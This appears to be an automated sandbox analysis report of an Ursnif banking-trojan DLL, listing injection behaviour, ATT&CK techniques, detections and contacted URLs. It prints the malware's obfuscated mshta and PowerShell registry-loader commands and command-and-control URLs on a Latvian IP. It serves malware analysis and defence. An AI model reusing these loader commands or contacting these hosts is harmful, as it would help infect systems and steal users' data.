                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6F6BD12E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: E20000Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6F6BD12E0Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 354000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 4B0000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute readJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: E20000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 4B0000 protect: page execute and read and writeJump to behavior
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 354000 value: 00Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 4B0000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40Jump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 6784Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3616Jump to behavior
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9868.tmp" "c:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA96F.tmp" "c:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
                      Source: explorer.exe, 0000001C.00000000.378233545.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405155586.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.420724914.0000000005E60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001C.00000000.378233545.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405155586.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.378035220.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000001C.00000000.378233545.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405155586.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405237737.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 0000001C.00000000.378233545.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405155586.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405237737.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059516C6 cpuid 2_2_059516C6
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059481F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,2_2_059481F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05942331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,2_2_05942331
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05931F75 GetVersion,GetModuleHandleA,GetProcAddress,2_2_05931F75
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059400DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,2_2_059400DC

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.253552130.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302666274.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253266400.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253321859.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253151966.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253379151.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253434533.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253537192.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253077310.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.303583479.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.299890111.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4956, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6784, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f894a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4fb6b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000000.368081484.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.418912961.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302561550.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.369488668.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.417250518.0000000004949000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302615586.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.370698760.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.253552130.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302666274.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253266400.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253321859.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253151966.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253379151.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253434533.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253537192.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253077310.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.303583479.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.299890111.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4956, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6784, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f894a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4fb6b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000000.368081484.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.418912961.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302561550.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.369488668.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.417250518.0000000004949000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302615586.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.370698760.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		1
                      Windows Management Instrumentation                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Obfuscated Files or Information                      		1
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium1
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth1
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)813
                      Process Injection                      		1
                      Masquerading                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Input Capture                      		Automated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials11
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items813
                      Process Injection                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 617384 Sample: 626a983c091a8.tiff.dll Startdate: 28/04/2022 Architecture: WINDOWS Score: 100 53 Snort IDS alert for network traffic 2->53 55 Found malware configuration 2->55 57 Yara detected  Ursnif 2->57 59 5 other signatures 2->59 9 loaddll32.exe 1 2->9         started        11 mshta.exe 19 2->11         started        process3 process4 13 cmd.exe 1 9->13         started        15 powershell.exe 31 11->15         started        process5 17 rundll32.exe 1 6 13->17         started        21 explorer.exe 2 3 15->21 injected 23 csc.exe 3 15->23         started        26 csc.exe 3 15->26         started        28 conhost.exe 15->28         started        dnsIp6 49 94.140.115.8, 49759, 80 NANO-ASLV Latvia 17->49 51 192.168.2.1 unknown unknown 17->51 61 System process connects to network (likely due to code injection or exploit) 17->61 63 Writes to foreign memory regions 17->63 65 Allocates memory in foreign processes 17->65 71 3 other signatures 17->71 30 control.exe 1 17->30         started        67 Self deletion via cmd delete 21->67 69 Disables SPDY (HTTP compression, likely to perform web injects) 21->69 33 cmd.exe 1 21->33         started        35 RuntimeBroker.exe 21->35 injected 45 C:\Users\user\AppData\Local\...\o1ulwvct.dll, PE32 23->45 dropped 37 cvtres.exe 1 23->37         started        47 C:\Users\user\AppData\Local\...\tn4ral5l.dll, PE32 26->47 dropped 39 cvtres.exe 1 26->39         started        file7 signatures8 process9 signatures10 73 Changes memory attributes in foreign processes to executable or writable 30->73 75 Injects code into the Windows Explorer (explorer.exe) 30->75 77 Writes to foreign memory regions 30->77 83 4 other signatures 30->83 79 Uses ping.exe to sleep 33->79 81 Uses ping.exe to check the status of other devices and networks 33->81 41 conhost.exe 33->41         started        43 PING.EXE 1 33->43         started        process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      626a983c091a8.tiff.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.rundll32.exe.2ca0000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://94.140.115.8/drew/pWUKzJDbrhpv/FFkNspqcCVD/4ANu5UR3K56aq1/YlZTd4vqqjxlSWQE81tmv/0903hK9AGVho5G_2/FPX1B2ZeY41YUql/9Zl7hUh81wcOKdUUaq/Z_2FlHHRh/JDsEpYdxv2Sil3Q8A91e/jYpDxmigXCYZ8PDT72P/GzAMhzuxMmNvrbZtpOxqlx/F1jRyqu5A3bI6/9P2_2BGh/CvwgeSwx46r_2FQDHgxUtUu/VEvc4RUsji/nf7CiGV7ZHZfisjbY/l_2FOYdkMf6Q/cPBDnAZaABD/3v7KHlHBv_2B/_2BGS0Es/y.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://crl.micro0%URL Reputationsafe
                      http://94.140.115.8/drew/ik1LQOZMh/mVRbIyzEQTxBwTr6Z5u6/zI22UmjAz8JK2nSoDWz/PBbBE92xQ6eDvkHhGI4LUa/C2IzDYhRuCy1X/B8bDGu4d/NNeE2BpCwJS_2BLL1GATet_/2FJaGdNT8S/qykJG_2BzgaYwDsmt/6L38BacVeBDK/DI5poywJVgk/0BVE0JF2RsEX1d/ehK8HVo5nM5dN_2BvfT0B/d2eei3kq6JFp_2Bo/wjjnHOVxOWAf9Rl/iq5emFWqLQuh9aW2bI/a4pKOz5Hp/Nn13tipc/V.jlk0%Avira URL Cloudsafe
                      http://94.140.115.8/drew/BCNeqjF198SdSe826/ArOdCqmPIWdy/mLsvCOAaonH/_2B_2FaHw_2FNP/whZllPw0UWDpWxMk3vD70/ZW7HQlXyVsLFMEnd/ioWk92wZdXi7gVZ/YpqeONxg_2FtJ1pLE0/gkg_2BzOr/T30turd_2FCKY_2FdW3S/SQG35opQqK5eweX5X3z/X5WbnNy0h0F7CgoMJPXQn8/WlhTd00F2BAHX/eC3JkGFi/jMv01ywCxcdZG9_2BXsKQ2k/cWPyDUzVgF/HeX7VJFkhkvecZXZ0/41xqfgFNRUy_/2Fgmw0qSg6Ao/JqGQVxm.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://94.140.115.8/drew/pWUKzJDbrhpv/FFkNspqcCVD/4ANu5UR3K56aq1/YlZTd4vqqjxlSWQE81tmv/0903hK9AGVho5G_2/FPX1B2ZeY41YUql/9Zl7hUh81wcOKdUUaq/Z_2FlHHRh/JDsEpYdxv2Sil3Q8A91e/jYpDxmigXCYZ8PDT72P/GzAMhzuxMmNvrbZtpOxqlx/F1jRyqu5A3bI6/9P2_2BGh/CvwgeSwx46r_2FQDHgxUtUu/VEvc4RUsji/nf7CiGV7ZHZfisjbY/l_2FOYdkMf6Q/cPBDnAZaABD/3v7KHlHBv_2B/_2BGS0Es/y.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://94.140.115.8/drew/ik1LQOZMh/mVRbIyzEQTxBwTr6Z5u6/zI22UmjAz8JK2nSoDWz/PBbBE92xQ6eDvkHhGI4LUa/C2IzDYhRuCy1X/B8bDGu4d/NNeE2BpCwJS_2BLL1GATet_/2FJaGdNT8S/qykJG_2BzgaYwDsmt/6L38BacVeBDK/DI5poywJVgk/0BVE0JF2RsEX1d/ehK8HVo5nM5dN_2BvfT0B/d2eei3kq6JFp_2Bo/wjjnHOVxOWAf9Rl/iq5emFWqLQuh9aW2bI/a4pKOz5Hp/Nn13tipc/V.jlktrue
